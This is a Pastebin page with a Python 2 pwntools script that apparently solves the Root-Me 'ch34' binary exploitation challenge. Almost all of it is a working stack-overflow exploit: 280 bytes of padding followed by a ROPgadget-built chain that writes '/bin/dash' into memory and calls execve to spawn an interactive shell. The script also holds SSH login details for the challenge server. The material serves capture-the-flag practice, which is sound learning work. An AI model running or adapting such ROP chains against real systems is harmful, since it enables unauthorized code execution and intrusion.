API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 27th, 2018
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.70 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2. # execve generated by ROPgadget
  3.  
  4. from pwn import *
  5. from struct import pack
  6.  
  7. DEBUG = 1
  8. if DEBUG:
  9. proc = process('./ch34')
  10. else:
  11. s = ssh(host='challenge03.root-me.org',
  12. user='app-systeme-ch34',
  13. password='app-systeme-ch34',
  14. port=2223)
  15. proc = s.process('./ch34')
  16.  
  17. # Padding goes here
  18. p = 'A'*280
  19.  
  20. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  21. p += pack('<Q', 0x00000000006c0000) # @ .data
  22. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  23. p += '////////'
  24. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  25.  
  26. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  27. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  28. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  29. p += 'bin/dash'
  30. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  31. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  32. p += pack('<Q', 0x00000000006c0010) # @ .data + 16
  33. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  34. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  35. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  36. p += pack('<Q', 0x00000000006c0000) # @ .data
  37. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  38. p += p64(0)
  39. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  40. p += p64(0)
  41. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  42. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  43. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  44. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  45. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  46. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  47. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  48. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  49. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  50. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  51. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  52. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  53. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  54. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  55. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  56. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  57. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  58. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  59. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  60. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  61. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  62. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  63. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  64. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  65. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  66. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  67. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  68. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  69. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  70. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  71. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  72. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  73. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  74. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  75. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  76. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  77. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  78. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  79. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  80. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  81. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  82. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  83. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  84. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  85. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  86. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  87. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  88. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  89. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  90. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  91. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  92. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  93. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  94. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  95. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  96. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  97. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  98. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  99. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  100. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  101. p += pack('<Q', 0x000000000045b525) # syscall ; ret
  102.  
  103. # gdb.attach(proc)
  104. proc.sendline(p)
  105. proc.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!